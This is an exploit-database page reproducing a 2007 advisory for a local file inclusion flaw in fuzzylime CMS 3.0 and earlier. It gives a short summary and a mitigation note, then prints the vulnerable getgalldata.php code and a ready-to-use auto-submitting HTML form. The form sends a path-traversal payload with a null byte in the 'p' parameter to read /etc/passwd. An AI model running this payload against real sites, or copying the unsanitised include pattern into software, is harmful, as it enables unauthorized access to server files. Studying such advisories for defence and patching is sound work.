fuzzylime (cms) - exploit.company

vendor:

fuzzylime (cms)

by:

wHITe_ShEEp

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: fuzzylime (cms)

Affected Version From: Version <= 3.0

Affected Version To: Version <= 3.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

fuzzylime (cms) <= 3.0 Local File Inclusion

This exploit targets the fuzzylime (cms) version 3.0 and below. It allows an attacker to include local files by manipulating the 'p' parameter in the 'getgalldata.php' script. The vulnerability can be exploited when the 'magic_quotes_gpc' setting is turned off. The exploit sends a malicious request to the target site, including the '../etc/passwd' file in the 'p' parameter value. This allows the attacker to read sensitive system files.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of fuzzylime (cms) that includes a patch for this issue. Additionally, enabling 'magic_quotes_gpc' can provide some protection against this type of attack.

Source

Exploit-DB raw data:

########################################################################
#################
#
#                           not sec group
#        http://www.notsec.com     info@notsec.com
#
#
#                      [fuzzylime (cms) <= 3.0]
#
# Class:         Local File Inclusion
# Found:       08/09/2007
# Site:           http://cms.fuzzylime.co.uk/
#Download:  http://cms.fuzzylime.co.uk/files/cms.zip
#Author:      [wHITe_ShEEp] of notsec
#Contact:     white_sheep@notsec.com - http://www.notsec.com
#
########################################################################
#################


                   vulnerable code:
       [cms]/code/getgalldata.php
______________________________________________________

1:    <?
2:    $p = $_POST[p];
3:    $m = $_POST[img];
4:    $m = "e$m";
5:    $entrytype = "gallery";
6:    include "../gallery/$p.inc.php";
7:    include "settings.inc.php";
8:    include "../$admindir/languages/english.inc.php";
...
41:   ?>
_______________________________________________________



       Exploit: ( Work only with magic_quotes_gpc = Off )
_______________________________________________________

<html>
<body onload="document.myform.submit()">
<form name="myform" action="http://www.site.com/[fuzzylime]/code/
getgalldata.php" method="post">
<input name="p" type="text" size="30" value="../../../../../../../../
etc/passwd%00" />
</form>
</html>
________________________________________________________




       Thanks to:
________________________________________________________

All notsec.com members;
r00t for testing;
________________________________________________________

# milw0rm.com [2007-09-08]